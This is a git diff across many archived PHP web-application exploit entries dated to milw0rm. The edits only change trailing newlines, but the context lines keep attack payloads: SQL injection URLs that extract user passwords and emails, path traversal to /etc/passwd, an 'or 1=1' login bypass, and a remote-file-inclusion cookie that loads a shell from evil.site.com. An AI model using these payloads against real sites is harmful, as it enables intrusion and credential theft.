milw0rm.com [2009-02-25] \ No newline at end of file diff --git a/platforms/php/webapps/8112.txt b/platforms/php/webapps/8112.txt index cae5320a5..6890688a1 100755 --- a/platforms/php/webapps/8112.txt +++ b/platforms/php/webapps/8112.txt @@ -25,4 +25,4 @@ _________ _____ __ [*] Details: Unhandled variable Inclusion in default template file results in RFI Vulnerability [*] Vul URL: [GOLABI_PATH]/templates/default/index_logged.php?main_loaded=1&cur_module=[EVIL_URL] -# milw0rm.com [2009-02-26] +# milw0rm.com [2009-02-26] \ No newline at end of file diff --git a/platforms/php/webapps/8114.txt b/platforms/php/webapps/8114.txt index 167016b10..4c738de30 100755 --- a/platforms/php/webapps/8114.txt +++ b/platforms/php/webapps/8114.txt @@ -24,4 +24,4 @@ | You'll become admin when the real admin will visit the page | +-------------------------------------------------------------------------+ -# milw0rm.com [2009-02-26] +# milw0rm.com [2009-02-26] \ No newline at end of file diff --git a/platforms/php/webapps/8115.pl b/platforms/php/webapps/8115.pl index 48f11e680..73db3694e 100755 --- a/platforms/php/webapps/8115.pl +++ b/platforms/php/webapps/8115.pl @@ -118,4 +118,4 @@ sub _send($$$$$$$) { } } -# milw0rm.com [2009-02-26] +# milw0rm.com [2009-02-26] \ No newline at end of file diff --git a/platforms/php/webapps/8116.txt b/platforms/php/webapps/8116.txt index c0e093725..810580cf5 100755 --- a/platforms/php/webapps/8116.txt +++ b/platforms/php/webapps/8116.txt @@ -21,4 +21,4 @@ Pass : or 1=1 ----------------------------------------- -# milw0rm.com [2009-02-26] +# milw0rm.com [2009-02-26] \ No newline at end of file diff --git a/platforms/php/webapps/8123.txt b/platforms/php/webapps/8123.txt index 0cc001239..771bd0ebe 100755 --- a/platforms/php/webapps/8123.txt +++ b/platforms/php/webapps/8123.txt @@ -88,4 +88,4 @@ Author: Eugene "Corwin" Ermakov Contact: corwin88[dog]mail[dot]ru -------- -# milw0rm.com [2009-02-27] +# milw0rm.com [2009-02-27] \ No newline at end of file diff --git a/platforms/php/webapps/8124.txt b/platforms/php/webapps/8124.txt index 854ef26f5..2c8ee31c2 100755 --- a/platforms/php/webapps/8124.txt +++ b/platforms/php/webapps/8124.txt @@ -447,4 +447,4 @@ sub help() { [/$$$] -# milw0rm.com [2009-02-27] +# milw0rm.com [2009-02-27] \ No newline at end of file diff --git a/platforms/php/webapps/8127.txt b/platforms/php/webapps/8127.txt index c105d09f9..a9039afe7 100755 --- a/platforms/php/webapps/8127.txt +++ b/platforms/php/webapps/8127.txt @@ -166,4 +166,4 @@ UserID='".$id."'")); ************************************************* -# milw0rm.com [2009-03-02] +# milw0rm.com [2009-03-02] \ No newline at end of file diff --git a/platforms/php/webapps/8128.txt b/platforms/php/webapps/8128.txt index 78f3297b3..da7d1dfd8 100755 --- a/platforms/php/webapps/8128.txt +++ b/platforms/php/webapps/8128.txt @@ -40,4 +40,4 @@ SQL Injection: -# milw0rm.com [2009-03-02] +# milw0rm.com [2009-03-02] \ No newline at end of file diff --git a/platforms/php/webapps/8133.txt b/platforms/php/webapps/8133.txt index 041397d16..748fd996c 100755 --- a/platforms/php/webapps/8133.txt +++ b/platforms/php/webapps/8133.txt @@ -44,4 +44,4 @@ Exploits: http://victim.it/path/?c=1 union select 0,0,0,concat(id,password,email ######################################################################################## -# milw0rm.com [2009-03-02] +# milw0rm.com [2009-03-02] \ No newline at end of file diff --git a/platforms/php/webapps/8134.php b/platforms/php/webapps/8134.php index aed63c59f..103f3af81 100755 --- a/platforms/php/webapps/8134.php +++ b/platforms/php/webapps/8134.php @@ -69,4 +69,4 @@ for ($j = 1; $j <= 49; $j++) { } ?> -# milw0rm.com [2009-03-02] +# milw0rm.com [2009-03-02] \ No newline at end of file diff --git a/platforms/php/webapps/8136.txt b/platforms/php/webapps/8136.txt index d121d10dc..8abf473c9 100755 --- a/platforms/php/webapps/8136.txt +++ b/platforms/php/webapps/8136.txt @@ -161,4 +161,4 @@ with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information. -# milw0rm.com [2009-03-02] +# milw0rm.com [2009-03-02] \ No newline at end of file diff --git a/platforms/php/webapps/8139.txt b/platforms/php/webapps/8139.txt index f292cd111..70af5f5f3 100755 --- a/platforms/php/webapps/8139.txt +++ b/platforms/php/webapps/8139.txt @@ -110,4 +110,4 @@ No fix. -- Salvatore "drosophila" Fresta CWNP444351 -# milw0rm.com [2009-03-02] +# milw0rm.com [2009-03-02] \ No newline at end of file diff --git a/platforms/php/webapps/814.txt b/platforms/php/webapps/814.txt index 0f19c5807..8761e19f7 100755 --- a/platforms/php/webapps/814.txt +++ b/platforms/php/webapps/814.txt @@ -4,4 +4,4 @@ Exploit: http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20=%201%20limit%201/* -# milw0rm.com [2005-02-12] +# milw0rm.com [2005-02-12] \ No newline at end of file diff --git a/platforms/php/webapps/8140.txt b/platforms/php/webapps/8140.txt index b459d2fe6..1657e7bdd 100755 --- a/platforms/php/webapps/8140.txt +++ b/platforms/php/webapps/8140.txt @@ -288,4 +288,4 @@ author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -# milw0rm.com [2009-03-03] +# milw0rm.com [2009-03-03] \ No newline at end of file diff --git a/platforms/php/webapps/8141.txt b/platforms/php/webapps/8141.txt index 705b8acef..f30ba8dd2 100755 --- a/platforms/php/webapps/8141.txt +++ b/platforms/php/webapps/8141.txt @@ -130,4 +130,4 @@ Tested on MAC OSX: /Applications/xampp/xamppfiles/htdocs/cbblog/admin/admin.php http://www.site.com/path/admin/admin.php?act=/../../../../../../../etc/passwd%00 -# milw0rm.com [2009-03-03] +# milw0rm.com [2009-03-03] \ No newline at end of file diff --git a/platforms/php/webapps/8145.txt b/platforms/php/webapps/8145.txt index 99df346d7..24e40d6a9 100755 --- a/platforms/php/webapps/8145.txt +++ b/platforms/php/webapps/8145.txt @@ -32,4 +32,4 @@ http://demo.ghostscripter.com:80/amazon/info.php?asin=[shell] http://demo.ghostscripter.com/amazon/search.php?query=1&mode=all -# milw0rm.com [2009-03-03] +# milw0rm.com [2009-03-03] \ No newline at end of file diff --git a/platforms/php/webapps/8150.txt b/platforms/php/webapps/8150.txt index 57909e383..5bb4de176 100755 --- a/platforms/php/webapps/8150.txt +++ b/platforms/php/webapps/8150.txt @@ -55,4 +55,4 @@ If you are not authenticated: PHPSESSID=241092c53c1379df01b743d910f61c62 -# milw0rm.com [2009-03-03] +# milw0rm.com [2009-03-03] \ No newline at end of file diff --git a/platforms/php/webapps/8151.txt b/platforms/php/webapps/8151.txt index d374216ca..d19eb6b81 100755 --- a/platforms/php/webapps/8151.txt +++ b/platforms/php/webapps/8151.txt @@ -36,4 +36,4 @@ greetz : Allah and all Mainhack BrotherHood jupe crew jangan ngegame melulu :p -# milw0rm.com [2009-03-03] +# milw0rm.com [2009-03-03] \ No newline at end of file diff --git a/platforms/php/webapps/8161.txt b/platforms/php/webapps/8161.txt index 5d56628b8..f38212241 100755 --- a/platforms/php/webapps/8161.txt +++ b/platforms/php/webapps/8161.txt @@ -97,4 +97,4 @@ No fix. ************************************************* -# milw0rm.com [2009-03-05] +# milw0rm.com [2009-03-05] \ No newline at end of file diff --git a/platforms/php/webapps/8164.php b/platforms/php/webapps/8164.php index dca8eef7a..adc29e9a7 100755 --- a/platforms/php/webapps/8164.php +++ b/platforms/php/webapps/8164.php @@ -56,4 +56,4 @@ echo "\nExploiting failed: find another site\n"; } ?> -# milw0rm.com [2009-03-05] +# milw0rm.com [2009-03-05] \ No newline at end of file diff --git a/platforms/php/webapps/8165.txt b/platforms/php/webapps/8165.txt index 6a23e5e61..cd1c725f7 100755 --- a/platforms/php/webapps/8165.txt +++ b/platforms/php/webapps/8165.txt @@ -31,4 +31,4 @@ javascript:document.cookie = "BlueEyeCMS_login=' UNION SELECT concat(user,0x3A,p # -EoF- # -# milw0rm.com [2009-03-06] +# milw0rm.com [2009-03-06] \ No newline at end of file diff --git a/platforms/php/webapps/8166.txt b/platforms/php/webapps/8166.txt index 9269215ec..5b35a0bd1 100755 --- a/platforms/php/webapps/8166.txt +++ b/platforms/php/webapps/8166.txt @@ -133,4 +133,4 @@ No fix. ************************************************* -# milw0rm.com [2009-03-06] +# milw0rm.com [2009-03-06] \ No newline at end of file diff --git a/platforms/php/webapps/8167.txt b/platforms/php/webapps/8167.txt index 410bdbc68..1495edf07 100755 --- a/platforms/php/webapps/8167.txt +++ b/platforms/php/webapps/8167.txt @@ -38,4 +38,4 @@ ******************************************************************************************* -# milw0rm.com [2009-03-06] +# milw0rm.com [2009-03-06] \ No newline at end of file diff --git a/platforms/php/webapps/8168.txt b/platforms/php/webapps/8168.txt index 0022e6a9a..9cc9a4891 100755 --- a/platforms/php/webapps/8168.txt +++ b/platforms/php/webapps/8168.txt @@ -38,4 +38,4 @@ ******************************************************************************************* -# milw0rm.com [2009-03-06] +# milw0rm.com [2009-03-06] \ No newline at end of file diff --git a/platforms/php/webapps/8170.txt b/platforms/php/webapps/8170.txt index 3e5b53144..15f7b7b62 100755 --- a/platforms/php/webapps/8170.txt +++ b/platforms/php/webapps/8170.txt @@ -58,4 +58,4 @@ No fix. ************************************************* -# milw0rm.com [2009-03-09] +# milw0rm.com [2009-03-09] \ No newline at end of file diff --git a/platforms/php/webapps/8172.txt b/platforms/php/webapps/8172.txt index 1ec17000c..7a8763d86 100755 --- a/platforms/php/webapps/8172.txt +++ b/platforms/php/webapps/8172.txt @@ -37,4 +37,4 @@ Cookie: binn_include_path=http://evil.site.com/shell.txt? # by cr0w # http://cr0w-at.blogspot.com -# milw0rm.com [2009-03-09] +# milw0rm.com [2009-03-09] \ No newline at end of file diff --git a/platforms/php/webapps/818.txt b/platforms/php/webapps/818.txt index c8e37f5d1..62e7870b1 100755 --- a/platforms/php/webapps/818.txt +++ b/platforms/php/webapps/818.txt @@ -17,4 +17,4 @@ Conditions: SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in init.php by secret array GLOBALS[]=1 ;))) -# milw0rm.com [2005-02-14] +# milw0rm.com [2005-02-14] \ No newline at end of file diff --git a/platforms/php/webapps/8181.c b/platforms/php/webapps/8181.c index 81408895b..74d815662 100755 --- a/platforms/php/webapps/8181.c +++ b/platforms/php/webapps/8181.c @@ -106,4 +106,4 @@ int main (int argc,char **argv) return 0; } -// milw0rm.com [2009-03-09] +// milw0rm.com [2009-03-09] \ No newline at end of file diff --git a/platforms/php/webapps/8182.txt b/platforms/php/webapps/8182.txt index c975c1004..10118f585 100755 --- a/platforms/php/webapps/8182.txt +++ b/platforms/php/webapps/8182.txt @@ -36,4 +36,4 @@ Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&co From Tiny Little island of Maldivies ------------------------------------- -# milw0rm.com [2009-03-09] +# milw0rm.com [2009-03-09] \ No newline at end of file diff --git a/platforms/php/webapps/8183.txt b/platforms/php/webapps/8183.txt index 48e73a142..1bf182bcf 100755 --- a/platforms/php/webapps/8183.txt +++ b/platforms/php/webapps/8183.txt @@ -36,4 +36,4 @@ # http://[host]/[path]/wbb/index.php?page=[] # it works on < 3.0.8 version only. -# milw0rm.com [2009-03-09] +# milw0rm.com [2009-03-09] \ No newline at end of file diff --git a/platforms/php/webapps/8184.txt b/platforms/php/webapps/8184.txt index 999b6df4e..04dc3f13d 100755 --- a/platforms/php/webapps/8184.txt +++ b/platforms/php/webapps/8184.txt @@ -14,4 +14,4 @@ http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION ##################################################### -# milw0rm.com [2009-03-09] +# milw0rm.com [2009-03-09] \ No newline at end of file diff --git a/platforms/php/webapps/8185.txt b/platforms/php/webapps/8185.txt index bceeeb18e..019e1851d 100755 --- a/platforms/php/webapps/8185.txt +++ b/platforms/php/webapps/8185.txt @@ -101,4 +101,4 @@ No fix. ************************************************* -# milw0rm.com [2009-03-09] +# milw0rm.com [2009-03-09] \ No newline at end of file diff --git a/platforms/php/webapps/8186.txt b/platforms/php/webapps/8186.txt index 786682819..64d7deac7 100755 --- a/platforms/php/webapps/8186.txt +++ b/platforms/php/webapps/8186.txt @@ -21,4 +21,4 @@ /join #wyjadacze on irc.quakenet.org -# milw0rm.com [2009-03-09] +# milw0rm.com [2009-03-09] \ No newline at end of file diff --git a/platforms/php/webapps/8188.txt b/platforms/php/webapps/8188.txt index 1494f0fd7..4b6bd540b 100755 --- a/platforms/php/webapps/8188.txt +++ b/platforms/php/webapps/8188.txt @@ -23,4 +23,4 @@ Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -# milw0rm.com [2009-03-10] +# milw0rm.com [2009-03-10] \ No newline at end of file diff --git a/platforms/php/webapps/8194.txt b/platforms/php/webapps/8194.txt index 0ff5998eb..bf42874ed 100755 --- a/platforms/php/webapps/8194.txt +++ b/platforms/php/webapps/8194.txt @@ -15,4 +15,4 @@ http://site.com/[path]/index.php?m=recipes&a=search&search=yes&course_id=5+union live demo : http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users-- -# milw0rm.com [2009-03-10] +# milw0rm.com [2009-03-10] \ No newline at end of file diff --git a/platforms/php/webapps/8195.txt b/platforms/php/webapps/8195.txt index 3de97befa..c3b277f39 100755 --- a/platforms/php/webapps/8195.txt +++ b/platforms/php/webapps/8195.txt @@ -83,4 +83,4 @@ Homepage: http://www.e-rdc.org/ -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2009-03-10] +# milw0rm.com [2009-03-10] \ No newline at end of file diff --git a/platforms/php/webapps/8196.txt b/platforms/php/webapps/8196.txt index 2f25a0cda..a3d9314ad 100755 --- a/platforms/php/webapps/8196.txt +++ b/platforms/php/webapps/8196.txt @@ -124,4 +124,4 @@ with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. -# milw0rm.com [2009-03-10] +# milw0rm.com [2009-03-10] \ No newline at end of file diff --git a/platforms/php/webapps/8197.txt b/platforms/php/webapps/8197.txt index 73277675e..eac7e6322 100755 --- a/platforms/php/webapps/8197.txt +++ b/platforms/php/webapps/8197.txt @@ -22,4 +22,4 @@ http://www.djiceatwork.com contact me at xados @ hotmail . it www.securitycode.it -# milw0rm.com [2009-03-10] +# milw0rm.com [2009-03-10] \ No newline at end of file diff --git a/platforms/php/webapps/8198.pl b/platforms/php/webapps/8198.pl index d0ed41574..e4bc56d34 100755 --- a/platforms/php/webapps/8198.pl +++ b/platforms/php/webapps/8198.pl @@ -44,4 +44,4 @@ if ($#ARGV < 2) {usage();} print "[+]=>Done!\n"; print "[+]=>Now, user $ARGV[1] is admin\n"; -# milw0rm.com [2009-03-10] +# milw0rm.com [2009-03-10] \ No newline at end of file diff --git a/platforms/php/webapps/820.php b/platforms/php/webapps/820.php index 9a5ab8243..282636af6 100755 --- a/platforms/php/webapps/820.php +++ b/platforms/php/webapps/820.php @@ -65,4 +65,4 @@ echo $res; ?> -// milw0rm.com [2005-02-15] +// milw0rm.com [2005-02-15] \ No newline at end of file diff --git a/platforms/php/webapps/8202.htm b/platforms/php/webapps/8202.htm index 3d35641a6..521faadb0 100755 --- a/platforms/php/webapps/8202.htm +++ b/platforms/php/webapps/8202.htm @@ -31,4 +31,4 @@ -# milw0rm.com [2009-03-11] +# milw0rm.com [2009-03-11] \ No newline at end of file diff --git a/platforms/php/webapps/8204.txt b/platforms/php/webapps/8204.txt index 30aadd34c..3b6f7759e 100755 --- a/platforms/php/webapps/8204.txt +++ b/platforms/php/webapps/8204.txt @@ -72,4 +72,4 @@ http://phpmysport.sourceforge.net/demo/index.php?r=competition&v1=view&v2=1&v3=1 <3 Beat Generation (or Byte generation ;-)) -# milw0rm.com [2009-03-12] +# milw0rm.com [2009-03-12] \ No newline at end of file diff --git a/platforms/php/webapps/8207.txt b/platforms/php/webapps/8207.txt index 0869bf4a0..004d8b5f9 100755 --- a/platforms/php/webapps/8207.txt +++ b/platforms/php/webapps/8207.txt @@ -19,4 +19,4 @@ # GREETZ : HACKERS PAL, Dr.Cr@ck, All soqor.net members, All Moroccan Hackers. -# milw0rm.com [2009-03-13] +# milw0rm.com [2009-03-13] \ No newline at end of file diff --git a/platforms/php/webapps/8209.txt b/platforms/php/webapps/8209.txt index cd80fb209..56c557960 100755 --- a/platforms/php/webapps/8209.txt +++ b/platforms/php/webapps/8209.txt @@ -24,4 +24,4 @@ password:[blank] ------------------------------------- Y0ung Ir4ni4n H4ck3rz -# milw0rm.com [2009-03-13] +# milw0rm.com [2009-03-13] \ No newline at end of file diff --git a/platforms/php/webapps/8210.txt b/platforms/php/webapps/8210.txt index 14d3d6357..e17a44148 100755 --- a/platforms/php/webapps/8210.txt +++ b/platforms/php/webapps/8210.txt @@ -38,4 +38,4 @@ Other Avenues for Attack: ++ Query MySQL database via /ubbthreads/admin/dbcommand.php?Cat= ++ Get MySQL username/password (it is plaintext) - view HTML Source of /ubbthreads/admin/editconfig.php?Cat= -# milw0rm.com [2009-03-16] +# milw0rm.com [2009-03-16] \ No newline at end of file diff --git a/platforms/php/webapps/8216.txt b/platforms/php/webapps/8216.txt index 1161b329d..eddfc439d 100755 --- a/platforms/php/webapps/8216.txt +++ b/platforms/php/webapps/8216.txt @@ -57,4 +57,4 @@ or die(mysql_error()); ####################################################################################################################### -# milw0rm.com [2009-03-16] +# milw0rm.com [2009-03-16] \ No newline at end of file diff --git a/platforms/php/webapps/8217.txt b/platforms/php/webapps/8217.txt index 95d118406..eec357391 100755 --- a/platforms/php/webapps/8217.txt +++ b/platforms/php/webapps/8217.txt @@ -31,4 +31,4 @@ at installation. ######################################################################################################### -# milw0rm.com [2009-03-16] +# milw0rm.com [2009-03-16] \ No newline at end of file diff --git a/platforms/php/webapps/8220.txt b/platforms/php/webapps/8220.txt index 3769de7d6..652414237 100755 --- a/platforms/php/webapps/8220.txt +++ b/platforms/php/webapps/8220.txt @@ -32,4 +32,4 @@ http://demo.phpcomasy.com/?id=22&entry_id=-9999+union+all+select+1,concat(userna #[!] United States of Albania ############################## -# milw0rm.com [2009-03-16] +# milw0rm.com [2009-03-16] \ No newline at end of file diff --git a/platforms/php/webapps/8226.txt b/platforms/php/webapps/8226.txt index 081126b7f..6c4b6f152 100755 --- a/platforms/php/webapps/8226.txt +++ b/platforms/php/webapps/8226.txt @@ -53,4 +53,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2009-03-17] +# milw0rm.com [2009-03-17] \ No newline at end of file diff --git a/platforms/php/webapps/8228.txt b/platforms/php/webapps/8228.txt index 9105fa1fb..b525b2ce5 100755 --- a/platforms/php/webapps/8228.txt +++ b/platforms/php/webapps/8228.txt @@ -51,4 +51,4 @@ ******************************************************************************************* -# milw0rm.com [2009-03-17] +# milw0rm.com [2009-03-17] \ No newline at end of file diff --git a/platforms/php/webapps/8229.txt b/platforms/php/webapps/8229.txt index d6e2ec03a..1da8e440f 100755 --- a/platforms/php/webapps/8229.txt +++ b/platforms/php/webapps/8229.txt @@ -14,4 +14,4 @@ # Greetz: str0ke and milw0rm.com ############################################################## -# milw0rm.com [2009-03-17] +# milw0rm.com [2009-03-17] \ No newline at end of file diff --git a/platforms/php/webapps/8230.txt b/platforms/php/webapps/8230.txt index def302ac5..576035941 100755 --- a/platforms/php/webapps/8230.txt +++ b/platforms/php/webapps/8230.txt @@ -18,4 +18,4 @@ Just addition This Exploit and enjoy # Author Garry /// 25/02/2009 # Www.Hacking.ge ############################################# -# milw0rm.com [2009-03-17] +# milw0rm.com [2009-03-17] \ No newline at end of file diff --git a/platforms/php/webapps/8237.txt b/platforms/php/webapps/8237.txt index bbbae255e..86d790f95 100755 --- a/platforms/php/webapps/8237.txt +++ b/platforms/php/webapps/8237.txt @@ -147,4 +147,4 @@ function getPhotoInfo($id) +Example: http://localhost/facil-cms/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,email+FROM+facil_users+LIMIT+1,2/* -# milw0rm.com [2009-03-18] +# milw0rm.com [2009-03-18] \ No newline at end of file diff --git a/platforms/php/webapps/8238.txt b/platforms/php/webapps/8238.txt index 137aa5592..706bbdf9b 100755 --- a/platforms/php/webapps/8238.txt +++ b/platforms/php/webapps/8238.txt @@ -44,4 +44,4 @@ Like we see the username is "demo" now you can continue finding another charters #[!] United States of Albania ############################## -# milw0rm.com [2009-03-18] +# milw0rm.com [2009-03-18] \ No newline at end of file diff --git a/platforms/php/webapps/8239.txt b/platforms/php/webapps/8239.txt index 9ba61f5d2..e4853169b 100755 --- a/platforms/php/webapps/8239.txt +++ b/platforms/php/webapps/8239.txt @@ -66,4 +66,4 @@ poc : http://www.pentagon.gov/~pivot_1406_full/extensions/bbclone_tools/count.php?refkey=../../../extensions/bbclone_tools/hr_conf.php -# milw0rm.com [2009-03-18] +# milw0rm.com [2009-03-18] \ No newline at end of file diff --git a/platforms/php/webapps/8240.txt b/platforms/php/webapps/8240.txt index c09d61168..bb26a9a12 100755 --- a/platforms/php/webapps/8240.txt +++ b/platforms/php/webapps/8240.txt @@ -70,4 +70,4 @@ FROM+deluxebb_users%23&sort=ASC&filter=all&searchuser=.&submit=1 girex -# milw0rm.com [2009-03-18] +# milw0rm.com [2009-03-18] \ No newline at end of file diff --git a/platforms/php/webapps/8243.txt b/platforms/php/webapps/8243.txt index 8ea3f2a06..6b79a28f1 100755 --- a/platforms/php/webapps/8243.txt +++ b/platforms/php/webapps/8243.txt @@ -82,4 +82,4 @@ www.site.com/action=edit&id=fireshot' union select 1,2,3,4,load_file('/etc/passw ############################################################################## -# milw0rm.com [2009-03-19] +# milw0rm.com [2009-03-19] \ No newline at end of file diff --git a/platforms/php/webapps/8244.txt b/platforms/php/webapps/8244.txt index 6e4dd7fa4..a463861f4 100755 --- a/platforms/php/webapps/8244.txt +++ b/platforms/php/webapps/8244.txt @@ -286,4 +286,4 @@ sub help() { ############################################################################ -# milw0rm.com [2009-03-19] +# milw0rm.com [2009-03-19] \ No newline at end of file diff --git a/platforms/php/webapps/8252.txt b/platforms/php/webapps/8252.txt index ae2a3655e..2b310063a 100755 --- a/platforms/php/webapps/8252.txt +++ b/platforms/php/webapps/8252.txt @@ -78,4 +78,4 @@ foobar | error | yes | This vulnerability report is also published at http://lampsecurity.org/Pixie-CMS-Multiple-Vulnerabilities. -# milw0rm.com [2009-03-20] +# milw0rm.com [2009-03-20] \ No newline at end of file diff --git a/platforms/php/webapps/8254.pl b/platforms/php/webapps/8254.pl index 522cccfcb..8f4991639 100755 --- a/platforms/php/webapps/8254.pl +++ b/platforms/php/webapps/8254.pl @@ -111,4 +111,4 @@ foreach(@charset) { } print "\n~ Done! Exploit by Invisibility\n"; -# milw0rm.com [2009-03-23] +# milw0rm.com [2009-03-23] \ No newline at end of file diff --git a/platforms/php/webapps/8255.txt b/platforms/php/webapps/8255.txt index e1bc9057f..50eeab0b0 100755 --- a/platforms/php/webapps/8255.txt +++ b/platforms/php/webapps/8255.txt @@ -24,4 +24,4 @@ http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pa #[!] www.TerminalHacker.es ############################## -# milw0rm.com [2009-03-23] +# milw0rm.com [2009-03-23] \ No newline at end of file diff --git a/platforms/php/webapps/8258.pl b/platforms/php/webapps/8258.pl index bc90daa4f..7455996b2 100755 --- a/platforms/php/webapps/8258.pl +++ b/platforms/php/webapps/8258.pl @@ -78,4 +78,4 @@ sub http_query { return $page; } -# milw0rm.com [2009-03-23] +# milw0rm.com [2009-03-23] \ No newline at end of file diff --git a/platforms/php/webapps/8268.php b/platforms/php/webapps/8268.php index 68955b6a4..34aa5d3e0 100755 --- a/platforms/php/webapps/8268.php +++ b/platforms/php/webapps/8268.php @@ -267,4 +267,4 @@ for(;;) ?> -# milw0rm.com [2009-03-23] +# milw0rm.com [2009-03-23] \ No newline at end of file diff --git a/platforms/php/webapps/8271.php b/platforms/php/webapps/8271.php index 3a5c2dc44..3663a9277 100755 --- a/platforms/php/webapps/8271.php +++ b/platforms/php/webapps/8271.php @@ -160,4 +160,4 @@ echo("---- pluck v 4.6.1 -----\n\n". ?> -# milw0rm.com [2009-03-23] +# milw0rm.com [2009-03-23] \ No newline at end of file diff --git a/platforms/php/webapps/8272.pl b/platforms/php/webapps/8272.pl index 18aaafb7a..654be5d39 100755 --- a/platforms/php/webapps/8272.pl +++ b/platforms/php/webapps/8272.pl @@ -122,4 +122,4 @@ while (1) close ($sock); } -# milw0rm.com [2009-03-23] +# milw0rm.com [2009-03-23] \ No newline at end of file diff --git a/platforms/php/webapps/8276.pl b/platforms/php/webapps/8276.pl index 541cb9588..ba267d39f 100755 --- a/platforms/php/webapps/8276.pl +++ b/platforms/php/webapps/8276.pl @@ -235,4 +235,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-03-23] +# milw0rm.com [2009-03-23] \ No newline at end of file diff --git a/platforms/php/webapps/8277.txt b/platforms/php/webapps/8277.txt index 8623799e6..8f091d569 100755 --- a/platforms/php/webapps/8277.txt +++ b/platforms/php/webapps/8277.txt @@ -36,4 +36,4 @@ Add a new self hosted game and when asked for "Thumb File" and "SWF Game File", The file you uploaded is now saved in the "games directory" and "thumbs directory". To find out where they are located, choose "Site Settings" from the Admin panel. -# milw0rm.com [2009-03-23] +# milw0rm.com [2009-03-23] \ No newline at end of file diff --git a/platforms/php/webapps/8278.txt b/platforms/php/webapps/8278.txt index d4433980a..0b3f7091e 100755 --- a/platforms/php/webapps/8278.txt +++ b/platforms/php/webapps/8278.txt @@ -45,4 +45,4 @@ ******************************************************************************************* -# milw0rm.com [2009-03-24] +# milw0rm.com [2009-03-24] \ No newline at end of file diff --git a/platforms/php/webapps/8279.txt b/platforms/php/webapps/8279.txt index e72901ad5..e7c1c95fe 100755 --- a/platforms/php/webapps/8279.txt +++ b/platforms/php/webapps/8279.txt @@ -93,4 +93,4 @@ http://192.168.0.1/phpizabi/?L=admin.logs.logs ... -------------------------------------------------------------------------------- -# milw0rm.com [2009-03-24] +# milw0rm.com [2009-03-24] \ No newline at end of file diff --git a/platforms/php/webapps/8282.txt b/platforms/php/webapps/8282.txt index 6dd363dff..2f0783b75 100755 --- a/platforms/php/webapps/8282.txt +++ b/platforms/php/webapps/8282.txt @@ -19,4 +19,4 @@ $v = mysql_fetch_array(mysql_query("SELECT id,views,title FROM videos WHERE id=' 1- http://victim.it/path/view.php?id=-1' union select 0,0,0,load_file('lf'),0,0,0-- ######################################################################################## -# milw0rm.com [2009-03-24] +# milw0rm.com [2009-03-24] \ No newline at end of file diff --git a/platforms/php/webapps/8287.php b/platforms/php/webapps/8287.php index f28b90a44..0aa02fc7d 100755 --- a/platforms/php/webapps/8287.php +++ b/platforms/php/webapps/8287.php @@ -135,4 +135,4 @@ while(1) ?> -# milw0rm.com [2009-03-25] +# milw0rm.com [2009-03-25] \ No newline at end of file diff --git a/platforms/php/webapps/8288.txt b/platforms/php/webapps/8288.txt index 05442a05a..f957e3d35 100755 --- a/platforms/php/webapps/8288.txt +++ b/platforms/php/webapps/8288.txt @@ -47,4 +47,4 @@ Dork: ~ Google : Powered by WeBid © 2008, 2009 Webid -# milw0rm.com [2009-03-25] +# milw0rm.com [2009-03-25] \ No newline at end of file diff --git a/platforms/php/webapps/8289.pl b/platforms/php/webapps/8289.pl index 6e74006e2..f0a466209 100755 --- a/platforms/php/webapps/8289.pl +++ b/platforms/php/webapps/8289.pl @@ -254,4 +254,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-03-26] +# milw0rm.com [2009-03-26] \ No newline at end of file diff --git a/platforms/php/webapps/8290.txt b/platforms/php/webapps/8290.txt index 99bc661cc..245f27957 100755 --- a/platforms/php/webapps/8290.txt +++ b/platforms/php/webapps/8290.txt @@ -49,4 +49,4 @@ Author: ahmadbady [kivi_hacker666@yahoo.com] --------------------------------------------------- -# milw0rm.com [2009-03-26] +# milw0rm.com [2009-03-26] \ No newline at end of file diff --git a/platforms/php/webapps/8291.txt b/platforms/php/webapps/8291.txt index 88152bdac..768f489c6 100755 --- a/platforms/php/webapps/8291.txt +++ b/platforms/php/webapps/8291.txt @@ -49,4 +49,4 @@ die(mysql_error()); ################################################################ -# milw0rm.com [2009-03-26] +# milw0rm.com [2009-03-26] \ No newline at end of file diff --git a/platforms/php/webapps/8292.txt b/platforms/php/webapps/8292.txt index 5644c99f2..52b8dd6a2 100755 --- a/platforms/php/webapps/8292.txt +++ b/platforms/php/webapps/8292.txt @@ -58,4 +58,4 @@ D-End... =============================================================================== -# milw0rm.com [2009-03-27] +# milw0rm.com [2009-03-27] \ No newline at end of file diff --git a/platforms/php/webapps/8293.txt b/platforms/php/webapps/8293.txt index c8f92d030..c6459c1e5 100755 --- a/platforms/php/webapps/8293.txt +++ b/platforms/php/webapps/8293.txt @@ -28,4 +28,4 @@ $query = mysql_query("SELECT username,password FROM `accounts` WHERE username='$ ------------------------------------ -# milw0rm.com [2009-03-27] +# milw0rm.com [2009-03-27] \ No newline at end of file diff --git a/platforms/php/webapps/8296.txt b/platforms/php/webapps/8296.txt index 80402fd7d..7de900d5c 100755 --- a/platforms/php/webapps/8296.txt +++ b/platforms/php/webapps/8296.txt @@ -20,4 +20,4 @@ Usernames show in comments, game scores, and so on. [!] FIX: Sanitize all input from the registers page form. -# milw0rm.com [2009-03-27] +# milw0rm.com [2009-03-27] \ No newline at end of file diff --git a/platforms/php/webapps/8297.txt b/platforms/php/webapps/8297.txt 